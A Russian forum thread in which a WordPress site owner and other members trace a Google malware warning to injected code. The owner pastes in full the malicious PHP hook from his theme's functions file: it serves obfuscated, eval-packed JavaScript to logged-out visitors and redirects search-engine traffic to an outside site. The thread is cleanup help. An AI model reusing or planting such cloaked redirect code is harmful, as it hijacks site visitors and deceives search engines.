[Помогите] Google сетует на вирус на сайте

Тема в разделе "Wordpress", создана пользователем nizulko, 20 апр 2012.

Статус темы:
Закрыта.
Модераторы: DzSoft, Sorcus
  1. nizulko

    nizulko

    Регистр.:
    5 ноя 2007
    Сообщения:
    166
    Симпатии:
    16
    Коллеги, буквально пару часов назад захожу на сайт и вижу картинку...

    Залез в код главной странички, ничего подозрительного не обнаружил.

    Как такое могло произойти, что делать?
     

    Вложения:

    • 111.png
      111.png
      Размер файла:
      43,9 КБ
      Просмотров:
      15
  2. latteo

    latteo Эффективное использование PHP, MySQL

    Moderator
    Регистр.:
    28 фев 2008
    Сообщения:
    1.522
    Симпатии:
    1.376
    Внизу страницы JS код, начинающийся с <script language="JavaScript">eval(function(p,a,c,k,e,r)
    удали и будет тебе счастье через несколько дней, когда ПС переиндексирует сайт (в гугл вебмастерс кажется можно ускорить)
     
  3. nizulko

    nizulko

    Регистр.:
    5 ноя 2007
    Сообщения:
    166
    Симпатии:
    16
    А нет такой функции на страничке - ни в начале, ни в конце. Сайт на Вордпрессе.
     
  4. latteo

    latteo Эффективное использование PHP, MySQL

    Moderator
    Регистр.:
    28 фев 2008
    Сообщения:
    1.522
    Симпатии:
    1.376
    Ты как проверяешь, что нет такого кода?
    Вирусы нынче умные пошли, вполне возможно, что он не для всех выводится(фильр например по признаку залогининости в админ панель).
    Пересмотри код шаблона, уделив особое внимание файлам footer и function, так же могут быть заражены плагины, вероятность заразы в других местах значительно ниже.

    Прилагаю html копию страницы, password:123
     

    Вложения:

    • vir-hhvd.rar
      Размер файла:
      4,5 КБ
      Просмотров:
      4
    nizulko нравится это.
  5. nizulko

    nizulko

    Регистр.:
    5 ноя 2007
    Сообщения:
    166
    Симпатии:
    16
    Огромная благодарность. Нашел в файле с функциями такой кусок:

    PHP:
    <?php
    add_action
    ('get_footer''add_sscounter');
        function 
    add_sscounter(){
            echo 
    '<!--scounter-->';
            if(
    function_exists('is_user_logged_in')){
                if(
    time()%== && !is_user_logged_in()){           
                    echo 
    "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
                }
            }
        }
    ?>
    Вопрос - что делает, как и когда он мог туда залететь, если пару часов назад все было окей... или просто Гугл мне не говорил об этом?!
     
  6. Grigirij

    Grigirij $$$

    Регистр.:
    25 сен 2008
    Сообщения:
    700
    Симпатии:
    334
    посмотри по дате последнего изменения в этом файле и поймёшь возможно когда его туда впихнули.
    гугл мог не сразу определить, что это вирусняк.
    Вариантов внедрения много от дырок в двиге или модов и до палева паролей для доступа к хостингу, фтп, админок...
    Для начала поменяй все пароли доступа, а потом думай о наличии дырок. Могли также и через соседей залезать.
    также шел советую поискать.
     
    nizulko нравится это.
  7. polyetilen

    polyetilen Заблокирован

    Регистр.:
    10 авг 2006
    Сообщения:
    814
    Симпатии:
    474
    Видно используестя файл timthumb.php, который давно славится дыркой в безопасности, загружает всё подряд и картинки и php скрипты на сервер
    wp-content/plugins/simple-post-thumbnails/timthumb.php
    в новой версии исправлено
    Перейти по ссылке
    надо версии сверить в начале файла
    define ('VERSION', '...')
    может через этот скрипт взломали.
    Можно зарегестрироватся в google webmasters tools Перейти по ссылке
    там добавить свой сайт и в диагностике будет анализ про вредные скрипты и ссылки где находится, всё поисправлять поудалять, и отослать заявку что почищено всё.
    там же на google webmasters tools
    или тут
    Перейти по ссылке

    ещё что делать
    Перейти по ссылке
    Перейти по ссылке

    ещё тут полно сканеров
    Перейти по ссылке
    например
    Перейти по ссылке
    найден вредный скрипт в конце страницы
     
    nizulko нравится это.
  8. nizulko

    nizulko

    Регистр.:
    5 ноя 2007
    Сообщения:
    166
    Симпатии:
    16
    Заменил файлик по ссылке.
    И вновь в бане... Теперь уже в функциях ничего не вижу.
     
  9. latteo

    latteo Эффективное использование PHP, MySQL

    Moderator
    Регистр.:
    28 фев 2008
    Сообщения:
    1.522
    Симпатии:
    1.376
    Eset обзывает его redirector - редирект на другой сайт происходит при скрипта выполнении.

    Бан не сразу снимают, а в течении некоторого времени от нескольких дней до нескольких недель.
    Чуть выше polyetilen хорошо расписал как можно скорить выход из бана.
     
    nizulko нравится это.
  10. nizulko

    nizulko

    Регистр.:
    5 ноя 2007
    Сообщения:
    166
    Симпатии:
    16
    Странно. Как только вырезал код - Хром перестал ругаться.
    А вы что-нибудь подозрительное на главной странице видите?
     
Статус темы:
Закрыта.